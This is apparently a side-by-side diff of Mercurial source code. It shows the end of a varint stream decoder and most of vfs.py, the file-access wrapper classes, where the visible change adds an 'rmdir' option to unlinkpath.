3771 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3772 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3772 127
3773 127
3773 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3774 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3774 1337
3775 1337
3775 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3776 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3776 65536
3777 65536
3777 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3778 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3778 Traceback (most recent call last):
3779 Traceback (most recent call last):
3779 ...
3780 ...
3780 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3781 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3781 """
3782 """
3782 result = 0
3783 result = 0
3783 shift = 0
3784 shift = 0
3784 while True:
3785 while True:
3785 byte = ord(readexactly(fh, 1))
3786 byte = ord(readexactly(fh, 1))
3786 result |= ((byte & 0x7f) << shift)
3787 result |= ((byte & 0x7f) << shift)
3787 if not (byte & 0x80):
3788 if not (byte & 0x80):
3788 return result
3789 return result
3789 shift += 7
3790 shift += 7
@@ -1,652 +1,653 b''
1 # vfs.py - Mercurial 'vfs' classes
1 # vfs.py - Mercurial 'vfs' classes
2 #
2 #
3 # Copyright Matt Mackall <mpm@selenic.com>
3 # Copyright Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7 from __future__ import absolute_import
7 from __future__ import absolute_import
8
8
9 import contextlib
9 import contextlib
10 import errno
10 import errno
11 import os
11 import os
12 import shutil
12 import shutil
13 import stat
13 import stat
14 import threading
14 import threading
15
15
16 from .i18n import _
16 from .i18n import _
17 from . import (
17 from . import (
18 encoding,
18 encoding,
19 error,
19 error,
20 pathutil,
20 pathutil,
21 pycompat,
21 pycompat,
22 util,
22 util,
23 )
23 )
24
24
25 def _avoidambig(path, oldstat):
25 def _avoidambig(path, oldstat):
26 """Avoid file stat ambiguity forcibly
26 """Avoid file stat ambiguity forcibly
27
27
28 This function causes copying ``path`` file, if it is owned by
28 This function causes copying ``path`` file, if it is owned by
29 another (see issue5418 and issue5584 for detail).
29 another (see issue5418 and issue5584 for detail).
30 """
30 """
31 def checkandavoid():
31 def checkandavoid():
32 newstat = util.filestat.frompath(path)
32 newstat = util.filestat.frompath(path)
33 # return whether file stat ambiguity is (already) avoided
33 # return whether file stat ambiguity is (already) avoided
34 return (not newstat.isambig(oldstat) or
34 return (not newstat.isambig(oldstat) or
35 newstat.avoidambig(path, oldstat))
35 newstat.avoidambig(path, oldstat))
36 if not checkandavoid():
36 if not checkandavoid():
37 # simply copy to change owner of path to get privilege to
37 # simply copy to change owner of path to get privilege to
38 # advance mtime (see issue5418)
38 # advance mtime (see issue5418)
39 util.rename(util.mktempcopy(path), path)
39 util.rename(util.mktempcopy(path), path)
40 checkandavoid()
40 checkandavoid()
41
41
42 class abstractvfs(object):
42 class abstractvfs(object):
43 """Abstract base class; cannot be instantiated"""
43 """Abstract base class; cannot be instantiated"""
44
44
45 def __init__(self, *args, **kwargs):
45 def __init__(self, *args, **kwargs):
46 '''Prevent instantiation; don't call this from subclasses.'''
46 '''Prevent instantiation; don't call this from subclasses.'''
47 raise NotImplementedError('attempted instantiating ' + str(type(self)))
47 raise NotImplementedError('attempted instantiating ' + str(type(self)))
48
48
49 def tryread(self, path):
49 def tryread(self, path):
50 '''gracefully return an empty string for missing files'''
50 '''gracefully return an empty string for missing files'''
51 try:
51 try:
52 return self.read(path)
52 return self.read(path)
53 except IOError as inst:
53 except IOError as inst:
54 if inst.errno != errno.ENOENT:
54 if inst.errno != errno.ENOENT:
55 raise
55 raise
56 return ""
56 return ""
57
57
58 def tryreadlines(self, path, mode='rb'):
58 def tryreadlines(self, path, mode='rb'):
59 '''gracefully return an empty array for missing files'''
59 '''gracefully return an empty array for missing files'''
60 try:
60 try:
61 return self.readlines(path, mode=mode)
61 return self.readlines(path, mode=mode)
62 except IOError as inst:
62 except IOError as inst:
63 if inst.errno != errno.ENOENT:
63 if inst.errno != errno.ENOENT:
64 raise
64 raise
65 return []
65 return []
66
66
67 @util.propertycache
67 @util.propertycache
68 def open(self):
68 def open(self):
69 '''Open ``path`` file, which is relative to vfs root.
69 '''Open ``path`` file, which is relative to vfs root.
70
70
71 Newly created directories are marked as "not to be indexed by
71 Newly created directories are marked as "not to be indexed by
72 the content indexing service", if ``notindexed`` is specified
72 the content indexing service", if ``notindexed`` is specified
73 for "write" mode access.
73 for "write" mode access.
74 '''
74 '''
75 return self.__call__
75 return self.__call__
76
76
77 def read(self, path):
77 def read(self, path):
78 with self(path, 'rb') as fp:
78 with self(path, 'rb') as fp:
79 return fp.read()
79 return fp.read()
80
80
81 def readlines(self, path, mode='rb'):
81 def readlines(self, path, mode='rb'):
82 with self(path, mode=mode) as fp:
82 with self(path, mode=mode) as fp:
83 return fp.readlines()
83 return fp.readlines()
84
84
85 def write(self, path, data, backgroundclose=False, **kwargs):
85 def write(self, path, data, backgroundclose=False, **kwargs):
86 with self(path, 'wb', backgroundclose=backgroundclose, **kwargs) as fp:
86 with self(path, 'wb', backgroundclose=backgroundclose, **kwargs) as fp:
87 return fp.write(data)
87 return fp.write(data)
88
88
89 def writelines(self, path, data, mode='wb', notindexed=False):
89 def writelines(self, path, data, mode='wb', notindexed=False):
90 with self(path, mode=mode, notindexed=notindexed) as fp:
90 with self(path, mode=mode, notindexed=notindexed) as fp:
91 return fp.writelines(data)
91 return fp.writelines(data)
92
92
93 def append(self, path, data):
93 def append(self, path, data):
94 with self(path, 'ab') as fp:
94 with self(path, 'ab') as fp:
95 return fp.write(data)
95 return fp.write(data)
96
96
97 def basename(self, path):
97 def basename(self, path):
98 """return base element of a path (as os.path.basename would do)
98 """return base element of a path (as os.path.basename would do)
99
99
100 This exists to allow handling of strange encoding if needed."""
100 This exists to allow handling of strange encoding if needed."""
101 return os.path.basename(path)
101 return os.path.basename(path)
102
102
103 def chmod(self, path, mode):
103 def chmod(self, path, mode):
104 return os.chmod(self.join(path), mode)
104 return os.chmod(self.join(path), mode)
105
105
106 def dirname(self, path):
106 def dirname(self, path):
107 """return dirname element of a path (as os.path.dirname would do)
107 """return dirname element of a path (as os.path.dirname would do)
108
108
109 This exists to allow handling of strange encoding if needed."""
109 This exists to allow handling of strange encoding if needed."""
110 return os.path.dirname(path)
110 return os.path.dirname(path)
111
111
112 def exists(self, path=None):
112 def exists(self, path=None):
113 return os.path.exists(self.join(path))
113 return os.path.exists(self.join(path))
114
114
115 def fstat(self, fp):
115 def fstat(self, fp):
116 return util.fstat(fp)
116 return util.fstat(fp)
117
117
118 def isdir(self, path=None):
118 def isdir(self, path=None):
119 return os.path.isdir(self.join(path))
119 return os.path.isdir(self.join(path))
120
120
121 def isfile(self, path=None):
121 def isfile(self, path=None):
122 return os.path.isfile(self.join(path))
122 return os.path.isfile(self.join(path))
123
123
124 def islink(self, path=None):
124 def islink(self, path=None):
125 return os.path.islink(self.join(path))
125 return os.path.islink(self.join(path))
126
126
127 def isfileorlink(self, path=None):
127 def isfileorlink(self, path=None):
128 '''return whether path is a regular file or a symlink
128 '''return whether path is a regular file or a symlink
129
129
130 Unlike isfile, this doesn't follow symlinks.'''
130 Unlike isfile, this doesn't follow symlinks.'''
131 try:
131 try:
132 st = self.lstat(path)
132 st = self.lstat(path)
133 except OSError:
133 except OSError:
134 return False
134 return False
135 mode = st.st_mode
135 mode = st.st_mode
136 return stat.S_ISREG(mode) or stat.S_ISLNK(mode)
136 return stat.S_ISREG(mode) or stat.S_ISLNK(mode)
137
137
138 def reljoin(self, *paths):
138 def reljoin(self, *paths):
139 """join various elements of a path together (as os.path.join would do)
139 """join various elements of a path together (as os.path.join would do)
140
140
141 The vfs base is not injected so that path stay relative. This exists
141 The vfs base is not injected so that path stay relative. This exists
142 to allow handling of strange encoding if needed."""
142 to allow handling of strange encoding if needed."""
143 return os.path.join(*paths)
143 return os.path.join(*paths)
144
144
145 def split(self, path):
145 def split(self, path):
146 """split top-most element of a path (as os.path.split would do)
146 """split top-most element of a path (as os.path.split would do)
147
147
148 This exists to allow handling of strange encoding if needed."""
148 This exists to allow handling of strange encoding if needed."""
149 return os.path.split(path)
149 return os.path.split(path)
150
150
151 def lexists(self, path=None):
151 def lexists(self, path=None):
152 return os.path.lexists(self.join(path))
152 return os.path.lexists(self.join(path))
153
153
154 def lstat(self, path=None):
154 def lstat(self, path=None):
155 return os.lstat(self.join(path))
155 return os.lstat(self.join(path))
156
156
157 def listdir(self, path=None):
157 def listdir(self, path=None):
158 return os.listdir(self.join(path))
158 return os.listdir(self.join(path))
159
159
160 def makedir(self, path=None, notindexed=True):
160 def makedir(self, path=None, notindexed=True):
161 return util.makedir(self.join(path), notindexed)
161 return util.makedir(self.join(path), notindexed)
162
162
163 def makedirs(self, path=None, mode=None):
163 def makedirs(self, path=None, mode=None):
164 return util.makedirs(self.join(path), mode)
164 return util.makedirs(self.join(path), mode)
165
165
166 def makelock(self, info, path):
166 def makelock(self, info, path):
167 return util.makelock(info, self.join(path))
167 return util.makelock(info, self.join(path))
168
168
169 def mkdir(self, path=None):
169 def mkdir(self, path=None):
170 return os.mkdir(self.join(path))
170 return os.mkdir(self.join(path))
171
171
172 def mkstemp(self, suffix='', prefix='tmp', dir=None):
172 def mkstemp(self, suffix='', prefix='tmp', dir=None):
173 fd, name = pycompat.mkstemp(suffix=suffix, prefix=prefix,
173 fd, name = pycompat.mkstemp(suffix=suffix, prefix=prefix,
174 dir=self.join(dir))
174 dir=self.join(dir))
175 dname, fname = util.split(name)
175 dname, fname = util.split(name)
176 if dir:
176 if dir:
177 return fd, os.path.join(dir, fname)
177 return fd, os.path.join(dir, fname)
178 else:
178 else:
179 return fd, fname
179 return fd, fname
180
180
181 def readdir(self, path=None, stat=None, skip=None):
181 def readdir(self, path=None, stat=None, skip=None):
182 return util.listdir(self.join(path), stat, skip)
182 return util.listdir(self.join(path), stat, skip)
183
183
184 def readlock(self, path):
184 def readlock(self, path):
185 return util.readlock(self.join(path))
185 return util.readlock(self.join(path))
186
186
187 def rename(self, src, dst, checkambig=False):
187 def rename(self, src, dst, checkambig=False):
188 """Rename from src to dst
188 """Rename from src to dst
189
189
190 checkambig argument is used with util.filestat, and is useful
190 checkambig argument is used with util.filestat, and is useful
191 only if destination file is guarded by any lock
191 only if destination file is guarded by any lock
192 (e.g. repo.lock or repo.wlock).
192 (e.g. repo.lock or repo.wlock).
193
193
194 To avoid file stat ambiguity forcibly, checkambig=True involves
194 To avoid file stat ambiguity forcibly, checkambig=True involves
195 copying ``src`` file, if it is owned by another. Therefore, use
195 copying ``src`` file, if it is owned by another. Therefore, use
196 checkambig=True only in limited cases (see also issue5418 and
196 checkambig=True only in limited cases (see also issue5418 and
197 issue5584 for detail).
197 issue5584 for detail).
198 """
198 """
199 srcpath = self.join(src)
199 srcpath = self.join(src)
200 dstpath = self.join(dst)
200 dstpath = self.join(dst)
201 oldstat = checkambig and util.filestat.frompath(dstpath)
201 oldstat = checkambig and util.filestat.frompath(dstpath)
202 if oldstat and oldstat.stat:
202 if oldstat and oldstat.stat:
203 ret = util.rename(srcpath, dstpath)
203 ret = util.rename(srcpath, dstpath)
204 _avoidambig(dstpath, oldstat)
204 _avoidambig(dstpath, oldstat)
205 return ret
205 return ret
206 return util.rename(srcpath, dstpath)
206 return util.rename(srcpath, dstpath)
207
207
208 def readlink(self, path):
208 def readlink(self, path):
209 return os.readlink(self.join(path))
209 return os.readlink(self.join(path))
210
210
211 def removedirs(self, path=None):
211 def removedirs(self, path=None):
212 """Remove a leaf directory and all empty intermediate ones
212 """Remove a leaf directory and all empty intermediate ones
213 """
213 """
214 return util.removedirs(self.join(path))
214 return util.removedirs(self.join(path))
215
215
216 def rmtree(self, path=None, ignore_errors=False, forcibly=False):
216 def rmtree(self, path=None, ignore_errors=False, forcibly=False):
217 """Remove a directory tree recursively
217 """Remove a directory tree recursively
218
218
219 If ``forcibly``, this tries to remove READ-ONLY files, too.
219 If ``forcibly``, this tries to remove READ-ONLY files, too.
220 """
220 """
221 if forcibly:
221 if forcibly:
222 def onerror(function, path, excinfo):
222 def onerror(function, path, excinfo):
223 if function is not os.remove:
223 if function is not os.remove:
224 raise
224 raise
225 # read-only files cannot be unlinked under Windows
225 # read-only files cannot be unlinked under Windows
226 s = os.stat(path)
226 s = os.stat(path)
227 if (s.st_mode & stat.S_IWRITE) != 0:
227 if (s.st_mode & stat.S_IWRITE) != 0:
228 raise
228 raise
229 os.chmod(path, stat.S_IMODE(s.st_mode) | stat.S_IWRITE)
229 os.chmod(path, stat.S_IMODE(s.st_mode) | stat.S_IWRITE)
230 os.remove(path)
230 os.remove(path)
231 else:
231 else:
232 onerror = None
232 onerror = None
233 return shutil.rmtree(self.join(path),
233 return shutil.rmtree(self.join(path),
234 ignore_errors=ignore_errors, onerror=onerror)
234 ignore_errors=ignore_errors, onerror=onerror)
235
235
236 def setflags(self, path, l, x):
236 def setflags(self, path, l, x):
237 return util.setflags(self.join(path), l, x)
237 return util.setflags(self.join(path), l, x)
238
238
239 def stat(self, path=None):
239 def stat(self, path=None):
240 return os.stat(self.join(path))
240 return os.stat(self.join(path))
241
241
242 def unlink(self, path=None):
242 def unlink(self, path=None):
243 return util.unlink(self.join(path))
243 return util.unlink(self.join(path))
244
244
245 def tryunlink(self, path=None):
245 def tryunlink(self, path=None):
246 """Attempt to remove a file, ignoring missing file errors."""
246 """Attempt to remove a file, ignoring missing file errors."""
247 util.tryunlink(self.join(path))
247 util.tryunlink(self.join(path))
248
248
249 def unlinkpath(self, path=None, ignoremissing=False):
249 def unlinkpath(self, path=None, ignoremissing=False, rmdir=True):
250 return util.unlinkpath(self.join(path), ignoremissing=ignoremissing)
250 return util.unlinkpath(self.join(path), ignoremissing=ignoremissing,
251 rmdir=rmdir)
251
252
252 def utime(self, path=None, t=None):
253 def utime(self, path=None, t=None):
253 return os.utime(self.join(path), t)
254 return os.utime(self.join(path), t)
254
255
255 def walk(self, path=None, onerror=None):
256 def walk(self, path=None, onerror=None):
256 """Yield (dirpath, dirs, files) tuple for each directories under path
257 """Yield (dirpath, dirs, files) tuple for each directories under path
257
258
258 ``dirpath`` is relative one from the root of this vfs. This
259 ``dirpath`` is relative one from the root of this vfs. This
259 uses ``os.sep`` as path separator, even you specify POSIX
260 uses ``os.sep`` as path separator, even you specify POSIX
260 style ``path``.
261 style ``path``.
261
262
262 "The root of this vfs" is represented as empty ``dirpath``.
263 "The root of this vfs" is represented as empty ``dirpath``.
263 """
264 """
264 root = os.path.normpath(self.join(None))
265 root = os.path.normpath(self.join(None))
265 # when dirpath == root, dirpath[prefixlen:] becomes empty
266 # when dirpath == root, dirpath[prefixlen:] becomes empty
266 # because len(dirpath) < prefixlen.
267 # because len(dirpath) < prefixlen.
267 prefixlen = len(pathutil.normasprefix(root))
268 prefixlen = len(pathutil.normasprefix(root))
268 for dirpath, dirs, files in os.walk(self.join(path), onerror=onerror):
269 for dirpath, dirs, files in os.walk(self.join(path), onerror=onerror):
269 yield (dirpath[prefixlen:], dirs, files)
270 yield (dirpath[prefixlen:], dirs, files)
270
271
271 @contextlib.contextmanager
272 @contextlib.contextmanager
272 def backgroundclosing(self, ui, expectedcount=-1):
273 def backgroundclosing(self, ui, expectedcount=-1):
273 """Allow files to be closed asynchronously.
274 """Allow files to be closed asynchronously.
274
275
275 When this context manager is active, ``backgroundclose`` can be passed
276 When this context manager is active, ``backgroundclose`` can be passed
276 to ``__call__``/``open`` to result in the file possibly being closed
277 to ``__call__``/``open`` to result in the file possibly being closed
277 asynchronously, on a background thread.
278 asynchronously, on a background thread.
278 """
279 """
279 # Sharing backgroundfilecloser between threads is complex and using
280 # Sharing backgroundfilecloser between threads is complex and using
280 # multiple instances puts us at risk of running out of file descriptors
281 # multiple instances puts us at risk of running out of file descriptors
281 # only allow to use backgroundfilecloser when in main thread.
282 # only allow to use backgroundfilecloser when in main thread.
282 if not isinstance(threading.currentThread(), threading._MainThread):
283 if not isinstance(threading.currentThread(), threading._MainThread):
283 yield
284 yield
284 return
285 return
285 vfs = getattr(self, 'vfs', self)
286 vfs = getattr(self, 'vfs', self)
286 if getattr(vfs, '_backgroundfilecloser', None):
287 if getattr(vfs, '_backgroundfilecloser', None):
287 raise error.Abort(
288 raise error.Abort(
288 _('can only have 1 active background file closer'))
289 _('can only have 1 active background file closer'))
289
290
290 with backgroundfilecloser(ui, expectedcount=expectedcount) as bfc:
291 with backgroundfilecloser(ui, expectedcount=expectedcount) as bfc:
291 try:
292 try:
292 vfs._backgroundfilecloser = bfc
293 vfs._backgroundfilecloser = bfc
293 yield bfc
294 yield bfc
294 finally:
295 finally:
295 vfs._backgroundfilecloser = None
296 vfs._backgroundfilecloser = None
296
297
297 class vfs(abstractvfs):
298 class vfs(abstractvfs):
298 '''Operate files relative to a base directory
299 '''Operate files relative to a base directory
299
300
300 This class is used to hide the details of COW semantics and
301 This class is used to hide the details of COW semantics and
301 remote file access from higher level code.
302 remote file access from higher level code.
302
303
303 'cacheaudited' should be enabled only if (a) vfs object is short-lived, or
304 'cacheaudited' should be enabled only if (a) vfs object is short-lived, or
304 (b) the base directory is managed by hg and considered sort-of append-only.
305 (b) the base directory is managed by hg and considered sort-of append-only.
305 See pathutil.pathauditor() for details.
306 See pathutil.pathauditor() for details.
306 '''
307 '''
307 def __init__(self, base, audit=True, cacheaudited=False, expandpath=False,
308 def __init__(self, base, audit=True, cacheaudited=False, expandpath=False,
308 realpath=False):
309 realpath=False):
309 if expandpath:
310 if expandpath:
310 base = util.expandpath(base)
311 base = util.expandpath(base)
311 if realpath:
312 if realpath:
312 base = os.path.realpath(base)
313 base = os.path.realpath(base)
313 self.base = base
314 self.base = base
314 self._audit = audit
315 self._audit = audit
315 if audit:
316 if audit:
316 self.audit = pathutil.pathauditor(self.base, cached=cacheaudited)
317 self.audit = pathutil.pathauditor(self.base, cached=cacheaudited)
317 else:
318 else:
318 self.audit = (lambda path, mode=None: True)
319 self.audit = (lambda path, mode=None: True)
319 self.createmode = None
320 self.createmode = None
320 self._trustnlink = None
321 self._trustnlink = None
321
322
322 @util.propertycache
323 @util.propertycache
323 def _cansymlink(self):
324 def _cansymlink(self):
324 return util.checklink(self.base)
325 return util.checklink(self.base)
325
326
326 @util.propertycache
327 @util.propertycache
327 def _chmod(self):
328 def _chmod(self):
328 return util.checkexec(self.base)
329 return util.checkexec(self.base)
329
330
330 def _fixfilemode(self, name):
331 def _fixfilemode(self, name):
331 if self.createmode is None or not self._chmod:
332 if self.createmode is None or not self._chmod:
332 return
333 return
333 os.chmod(name, self.createmode & 0o666)
334 os.chmod(name, self.createmode & 0o666)
334
335
335 def __call__(self, path, mode="r", atomictemp=False, notindexed=False,
336 def __call__(self, path, mode="r", atomictemp=False, notindexed=False,
336 backgroundclose=False, checkambig=False, auditpath=True):
337 backgroundclose=False, checkambig=False, auditpath=True):
337 '''Open ``path`` file, which is relative to vfs root.
338 '''Open ``path`` file, which is relative to vfs root.
338
339
339 Newly created directories are marked as "not to be indexed by
340 Newly created directories are marked as "not to be indexed by
340 the content indexing service", if ``notindexed`` is specified
341 the content indexing service", if ``notindexed`` is specified
341 for "write" mode access.
342 for "write" mode access.
342
343
343 If ``backgroundclose`` is passed, the file may be closed asynchronously.
344 If ``backgroundclose`` is passed, the file may be closed asynchronously.
344 It can only be used if the ``self.backgroundclosing()`` context manager
345 It can only be used if the ``self.backgroundclosing()`` context manager
345 is active. This should only be specified if the following criteria hold:
346 is active. This should only be specified if the following criteria hold:
346
347
347 1. There is a potential for writing thousands of files. Unless you
348 1. There is a potential for writing thousands of files. Unless you
348 are writing thousands of files, the performance benefits of
349 are writing thousands of files, the performance benefits of
349 asynchronously closing files is not realized.
350 asynchronously closing files is not realized.
350 2. Files are opened exactly once for the ``backgroundclosing``
351 2. Files are opened exactly once for the ``backgroundclosing``
351 active duration and are therefore free of race conditions between
352 active duration and are therefore free of race conditions between
352 closing a file on a background thread and reopening it. (If the
353 closing a file on a background thread and reopening it. (If the
353 file were opened multiple times, there could be unflushed data
354 file were opened multiple times, there could be unflushed data
354 because the original file handle hasn't been flushed/closed yet.)
355 because the original file handle hasn't been flushed/closed yet.)
355
356
356 ``checkambig`` argument is passed to atomictemplfile (valid
357 ``checkambig`` argument is passed to atomictemplfile (valid
357 only for writing), and is useful only if target file is
358 only for writing), and is useful only if target file is
358 guarded by any lock (e.g. repo.lock or repo.wlock).
359 guarded by any lock (e.g. repo.lock or repo.wlock).
359
360
360 To avoid file stat ambiguity forcibly, checkambig=True involves
361 To avoid file stat ambiguity forcibly, checkambig=True involves
361 copying ``path`` file opened in "append" mode (e.g. for
362 copying ``path`` file opened in "append" mode (e.g. for
362 truncation), if it is owned by another. Therefore, use
363 truncation), if it is owned by another. Therefore, use
363 combination of append mode and checkambig=True only in limited
364 combination of append mode and checkambig=True only in limited
364 cases (see also issue5418 and issue5584 for detail).
365 cases (see also issue5418 and issue5584 for detail).
365 '''
366 '''
366 if auditpath:
367 if auditpath:
367 if self._audit:
368 if self._audit:
368 r = util.checkosfilename(path)
369 r = util.checkosfilename(path)
369 if r:
370 if r:
370 raise error.Abort("%s: %r" % (r, path))
371 raise error.Abort("%s: %r" % (r, path))
371 self.audit(path, mode=mode)
372 self.audit(path, mode=mode)
372 f = self.join(path)
373 f = self.join(path)
373
374
374 if "b" not in mode:
375 if "b" not in mode:
375 mode += "b" # for that other OS
376 mode += "b" # for that other OS
376
377
377 nlink = -1
378 nlink = -1
378 if mode not in ('r', 'rb'):
379 if mode not in ('r', 'rb'):
379 dirname, basename = util.split(f)
380 dirname, basename = util.split(f)
380 # If basename is empty, then the path is malformed because it points
381 # If basename is empty, then the path is malformed because it points
381 # to a directory. Let the posixfile() call below raise IOError.
382 # to a directory. Let the posixfile() call below raise IOError.
382 if basename:
383 if basename:
383 if atomictemp:
384 if atomictemp:
384 util.makedirs(dirname, self.createmode, notindexed)
385 util.makedirs(dirname, self.createmode, notindexed)
385 return util.atomictempfile(f, mode, self.createmode,
386 return util.atomictempfile(f, mode, self.createmode,
386 checkambig=checkambig)
387 checkambig=checkambig)
387 try:
388 try:
388 if 'w' in mode:
389 if 'w' in mode:
389 util.unlink(f)
390 util.unlink(f)
390 nlink = 0
391 nlink = 0
391 else:
392 else:
392 # nlinks() may behave differently for files on Windows
393 # nlinks() may behave differently for files on Windows
393 # shares if the file is open.
394 # shares if the file is open.
394 with util.posixfile(f):
395 with util.posixfile(f):
395 nlink = util.nlinks(f)
396 nlink = util.nlinks(f)
396 if nlink < 1:
397 if nlink < 1:
397 nlink = 2 # force mktempcopy (issue1922)
398 nlink = 2 # force mktempcopy (issue1922)
398 except (OSError, IOError) as e:
399 except (OSError, IOError) as e:
399 if e.errno != errno.ENOENT:
400 if e.errno != errno.ENOENT:
400 raise
401 raise
401 nlink = 0
402 nlink = 0
402 util.makedirs(dirname, self.createmode, notindexed)
403 util.makedirs(dirname, self.createmode, notindexed)
403 if nlink > 0:
404 if nlink > 0:
404 if self._trustnlink is None:
405 if self._trustnlink is None:
405 self._trustnlink = nlink > 1 or util.checknlink(f)
406 self._trustnlink = nlink > 1 or util.checknlink(f)
406 if nlink > 1 or not self._trustnlink:
407 if nlink > 1 or not self._trustnlink:
407 util.rename(util.mktempcopy(f), f)
408 util.rename(util.mktempcopy(f), f)
408 fp = util.posixfile(f, mode)
409 fp = util.posixfile(f, mode)
409 if nlink == 0:
410 if nlink == 0:
410 self._fixfilemode(f)
411 self._fixfilemode(f)
411
412
412 if checkambig:
413 if checkambig:
413 if mode in ('r', 'rb'):
414 if mode in ('r', 'rb'):
414 raise error.Abort(_('implementation error: mode %s is not'
415 raise error.Abort(_('implementation error: mode %s is not'
415 ' valid for checkambig=True') % mode)
416 ' valid for checkambig=True') % mode)
416 fp = checkambigatclosing(fp)
417 fp = checkambigatclosing(fp)
417
418
418 if (backgroundclose and
419 if (backgroundclose and
419 isinstance(threading.currentThread(), threading._MainThread)):
420 isinstance(threading.currentThread(), threading._MainThread)):
420 if not self._backgroundfilecloser:
421 if not self._backgroundfilecloser:
421 raise error.Abort(_('backgroundclose can only be used when a '
422 raise error.Abort(_('backgroundclose can only be used when a '
422 'backgroundclosing context manager is active')
423 'backgroundclosing context manager is active')
423 )
424 )
424
425
425 fp = delayclosedfile(fp, self._backgroundfilecloser)
426 fp = delayclosedfile(fp, self._backgroundfilecloser)
426
427
427 return fp
428 return fp
428
429
429 def symlink(self, src, dst):
430 def symlink(self, src, dst):
430 self.audit(dst)
431 self.audit(dst)
431 linkname = self.join(dst)
432 linkname = self.join(dst)
432 util.tryunlink(linkname)
433 util.tryunlink(linkname)
433
434
434 util.makedirs(os.path.dirname(linkname), self.createmode)
435 util.makedirs(os.path.dirname(linkname), self.createmode)
435
436
436 if self._cansymlink:
437 if self._cansymlink:
437 try:
438 try:
438 os.symlink(src, linkname)
439 os.symlink(src, linkname)
439 except OSError as err:
440 except OSError as err:
440 raise OSError(err.errno, _('could not symlink to %r: %s') %
441 raise OSError(err.errno, _('could not symlink to %r: %s') %
441 (src, encoding.strtolocal(err.strerror)),
442 (src, encoding.strtolocal(err.strerror)),
442 linkname)
443 linkname)
443 else:
444 else:
444 self.write(dst, src)
445 self.write(dst, src)
445
446
446 def join(self, path, *insidef):
447 def join(self, path, *insidef):
447 if path:
448 if path:
448 return os.path.join(self.base, path, *insidef)
449 return os.path.join(self.base, path, *insidef)
449 else:
450 else:
450 return self.base
451 return self.base
451
452
452 opener = vfs
453 opener = vfs
453
454
454 class proxyvfs(object):
455 class proxyvfs(object):
455 def __init__(self, vfs):
456 def __init__(self, vfs):
456 self.vfs = vfs
457 self.vfs = vfs
457
458
458 @property
459 @property
459 def options(self):
460 def options(self):
460 return self.vfs.options
461 return self.vfs.options
461
462
462 @options.setter
463 @options.setter
463 def options(self, value):
464 def options(self, value):
464 self.vfs.options = value
465 self.vfs.options = value
465
466
466 class filtervfs(abstractvfs, proxyvfs):
467 class filtervfs(abstractvfs, proxyvfs):
467 '''Wrapper vfs for filtering filenames with a function.'''
468 '''Wrapper vfs for filtering filenames with a function.'''
468
469
469 def __init__(self, vfs, filter):
470 def __init__(self, vfs, filter):
470 proxyvfs.__init__(self, vfs)
471 proxyvfs.__init__(self, vfs)
471 self._filter = filter
472 self._filter = filter
472
473
473 def __call__(self, path, *args, **kwargs):
474 def __call__(self, path, *args, **kwargs):
474 return self.vfs(self._filter(path), *args, **kwargs)
475 return self.vfs(self._filter(path), *args, **kwargs)
475
476
476 def join(self, path, *insidef):
477 def join(self, path, *insidef):
477 if path:
478 if path:
478 return self.vfs.join(self._filter(self.vfs.reljoin(path, *insidef)))
479 return self.vfs.join(self._filter(self.vfs.reljoin(path, *insidef)))
479 else:
480 else:
480 return self.vfs.join(path)
481 return self.vfs.join(path)
481
482
482 filteropener = filtervfs
483 filteropener = filtervfs
483
484
484 class readonlyvfs(abstractvfs, proxyvfs):
485 class readonlyvfs(abstractvfs, proxyvfs):
485 '''Wrapper vfs preventing any writing.'''
486 '''Wrapper vfs preventing any writing.'''
486
487
487 def __init__(self, vfs):
488 def __init__(self, vfs):
488 proxyvfs.__init__(self, vfs)
489 proxyvfs.__init__(self, vfs)
489
490
490 def __call__(self, path, mode='r', *args, **kw):
491 def __call__(self, path, mode='r', *args, **kw):
491 if mode not in ('r', 'rb'):
492 if mode not in ('r', 'rb'):
492 raise error.Abort(_('this vfs is read only'))
493 raise error.Abort(_('this vfs is read only'))
493 return self.vfs(path, mode, *args, **kw)
494 return self.vfs(path, mode, *args, **kw)
494
495
495 def join(self, path, *insidef):
496 def join(self, path, *insidef):
496 return self.vfs.join(path, *insidef)
497 return self.vfs.join(path, *insidef)
497
498
498 class closewrapbase(object):
499 class closewrapbase(object):
499 """Base class of wrapper, which hooks closing
500 """Base class of wrapper, which hooks closing
500
501
501 Do not instantiate outside of the vfs layer.
502 Do not instantiate outside of the vfs layer.
502 """
503 """
503 def __init__(self, fh):
504 def __init__(self, fh):
504 object.__setattr__(self, r'_origfh', fh)
505 object.__setattr__(self, r'_origfh', fh)
505
506
506 def __getattr__(self, attr):
507 def __getattr__(self, attr):
507 return getattr(self._origfh, attr)
508 return getattr(self._origfh, attr)
508
509
509 def __setattr__(self, attr, value):
510 def __setattr__(self, attr, value):
510 return setattr(self._origfh, attr, value)
511 return setattr(self._origfh, attr, value)
511
512
512 def __delattr__(self, attr):
513 def __delattr__(self, attr):
513 return delattr(self._origfh, attr)
514 return delattr(self._origfh, attr)
514
515
515 def __enter__(self):
516 def __enter__(self):
516 return self._origfh.__enter__()
517 return self._origfh.__enter__()
517
518
518 def __exit__(self, exc_type, exc_value, exc_tb):
519 def __exit__(self, exc_type, exc_value, exc_tb):
519 raise NotImplementedError('attempted instantiating ' + str(type(self)))
520 raise NotImplementedError('attempted instantiating ' + str(type(self)))
520
521
521 def close(self):
522 def close(self):
522 raise NotImplementedError('attempted instantiating ' + str(type(self)))
523 raise NotImplementedError('attempted instantiating ' + str(type(self)))
523
524
524 class delayclosedfile(closewrapbase):
525 class delayclosedfile(closewrapbase):
525 """Proxy for a file object whose close is delayed.
526 """Proxy for a file object whose close is delayed.
526
527
527 Do not instantiate outside of the vfs layer.
528 Do not instantiate outside of the vfs layer.
528 """
529 """
529 def __init__(self, fh, closer):
530 def __init__(self, fh, closer):
530 super(delayclosedfile, self).__init__(fh)
531 super(delayclosedfile, self).__init__(fh)
